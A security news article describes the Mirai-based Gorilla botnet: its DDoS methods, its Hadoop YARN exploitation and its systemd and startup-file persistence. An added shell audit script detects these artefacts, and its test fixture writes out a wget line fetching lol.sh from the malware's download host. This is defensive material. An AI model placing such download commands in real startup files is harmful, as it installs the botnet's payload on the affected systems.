Gorilla Botnet
Cybersecurity researchers have identified a new family of botnet malware known as Gorilla (or GorillaBot), which is based on the disclosed source code of the Mirai Botnet.
According to the experts monitoring this activity, the Gorilla botnet issued more than 300,000 attack commands within a remarkably short period in September 2024, an exceptionally high attack rate. On average, the botnet issued around 20,000 commands per day, all of them directing distributed denial-of-service (DDoS) attacks.
Over 100 Countries Targeted by DDoS Attempts
The botnet is reported to have targeted over 100 countries, launching attacks against universities, government websites, telecommunications, banks, as well as the gaming and gambling industries. The most affected nations include China, the United States, Canada and Germany.
Experts indicate that Gorilla primarily employs methods such as UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood to carry out its DDoS attacks. The connectionless nature of the UDP protocol enables arbitrary source IP spoofing, resulting in a significant volume of traffic.
In addition to its support for multiple CPU architectures, including ARM, MIPS, x86_64, and x86, the botnet is equipped with the capability to connect to one of five predefined Command-and-Control (C2) servers to receive DDoS commands.
Exploiting Vulnerabilities and Persistence Mechanism
In a notable development, the malware incorporates functions to exploit a security vulnerability in Apache Hadoop YARN RPC, allowing it to achieve remote code execution. This particular flaw has been exploited in the wild since at least 2021.
To ensure persistence on the host, the malware creates a service file named custom.service in the /etc/systemd/system/ directory, which is configured to run automatically at system startup. This service is tasked with downloading and executing a shell script called lol.sh from a remote server (pen.gorillafirewall.su). Additionally, similar commands are inserted into the /etc/inittab, /etc/profile, and /boot/bootcmd files to facilitate the downloading and execution of the shell script upon system startup or user login.
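A host audit for the persistence locations listed above, added here as an example and not taken from the report or from any vendor tool. It assumes only the artefacts the text names (the custom.service unit, the lol.sh script, the pen.gorillafirewall.su host and the three startup files) and builds a constructed sample tree so it can be exercised without touching a live system.

```shell
#!/bin/sh
# Added example (not from the original report): audit a Linux filesystem
# for the Gorilla persistence artefacts named in the write-up. Pass a root
# path to scan a mounted image or a test tree instead of the live host.

# Indicators taken from the report: the systemd unit, the dropped script,
# the download host, and the three startup files the malware edits.
UNIT_FILE="etc/systemd/system/custom.service"
SCRIPT_NAME="lol.sh"
DROP_HOST="pen.gorillafirewall.su"
STARTUP_FILES="etc/inittab etc/profile boot/bootcmd"

# references_dropper FILE: true if FILE mentions the script or the host.
references_dropper() {
    grep -qF -e "$SCRIPT_NAME" -e "$DROP_HOST" "$1" 2>/dev/null
}

# gorilla_audit ROOT: print one FINDING line per artefact, store the count
# in GORILLA_HITS, return 0 when clean and 1 when anything was found.
gorilla_audit() {
    root="${1:-/}"
    GORILLA_HITS=0
    if [ -f "$root/$UNIT_FILE" ]; then
        echo "FINDING: unit file present: /$UNIT_FILE"
        GORILLA_HITS=$((GORILLA_HITS + 1))
        if references_dropper "$root/$UNIT_FILE"; then
            echo "FINDING: /$UNIT_FILE references $SCRIPT_NAME or $DROP_HOST"
            GORILLA_HITS=$((GORILLA_HITS + 1))
        fi
    fi
    for f in $STARTUP_FILES; do
        if references_dropper "$root/$f"; then
            echo "FINDING: /$f references $SCRIPT_NAME or $DROP_HOST"
            GORILLA_HITS=$((GORILLA_HITS + 1))
        fi
    done
    [ "$GORILLA_HITS" -eq 0 ]
}

# make_sample_tree DIR: constructed fixture mimicking the described
# persistence (unit file plus an edited /boot/bootcmd) for offline testing.
make_sample_tree() {
    mkdir -p "$1/etc/systemd/system" "$1/boot"
    printf '[Service]\nExecStart=/bin/sh -c "wget http://%s/%s"\n' \
        "$DROP_HOST" "$SCRIPT_NAME" > "$1/$UNIT_FILE"
    printf 'export PATH\n' > "$1/etc/profile"
    printf 'wget http://%s/%s\n' "$DROP_HOST" "$SCRIPT_NAME" > "$1/boot/bootcmd"
}

# Demo on the constructed tree; on a real host run "gorilla_audit /" instead.
sample=$(mktemp -d)
make_sample_tree "$sample"
gorilla_audit "$sample" || echo "$GORILLA_HITS finding(s) in $sample"
rm -rf "$sample"
```

A clean host yields no FINDING lines and exit status 0; the sample tree yields three findings (unit present, unit references the host, bootcmd references the host).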
The malware introduces a variety of DDoS attack methods and employs encryption algorithms commonly used by the Keksec group to obscure critical information. It also utilizes multiple techniques to maintain long-term control over IoT devices and cloud hosts, reflecting a sophisticated awareness of counter-detection measures typical of emerging botnet families.
Some security researchers suggest that the Gorilla Botnet malware is not entirely new, having been active for over a year.